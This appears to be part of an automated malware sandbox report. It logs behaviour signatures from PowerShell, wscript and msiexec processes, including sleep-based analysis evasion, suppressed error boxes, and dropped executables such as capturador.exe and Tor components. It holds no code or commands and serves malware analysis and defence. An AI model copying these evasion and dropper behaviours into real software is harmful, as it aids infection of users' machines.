Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 3688 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1336Thread sleep count: 4068 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep count: 53 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6316Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6316Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412Thread sleep count: 4572 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5464Thread sleep count: 3156 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899859s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899750s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899640s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899515s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899390s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899250s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899125s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -899000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -898889s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -898765s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -898628s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -898500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -898344s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -898187s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -898078s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897951s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897827s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897694s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897561s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897436s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897327s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897202s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -897047s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896936s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896828s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896703s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896562s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896437s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896297s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896187s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -896047s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -895891s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -895750s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -895594s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -895453s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -895328s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -895203s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -895074s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -894951s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -894765s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -894641s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -894516s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -894406s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -894297s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -894125s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -893979s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -893844s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -893702s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -893547s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -893406s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -893250s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -893124s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -892984s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -892844s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -892719s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -892578s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -892459s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -892297s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE275.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\ProgramData\Leitor\capturador.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\JQHPQS\libevent_extra-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE17A.tmpJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\JQHPQS\capturador.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\JQHPQS\libevent_core-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\ProgramData\Leitor\libevent_core-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE39F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\ProgramData\Leitor\libevent_extra-2-1-7.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\JQHPQS\QRROJT.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\ProgramData\Leitor\tor-gencert.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\JQHPQS\tor-gencert.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899515
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898889
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898344
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897951
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897827
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897694
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897561
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897436
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897327
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897202
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896936
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895891
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895594
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895203
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895074
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894951
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894641
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894406
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893979
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893702
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893406
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892719
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892459
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3688Jump to behavior
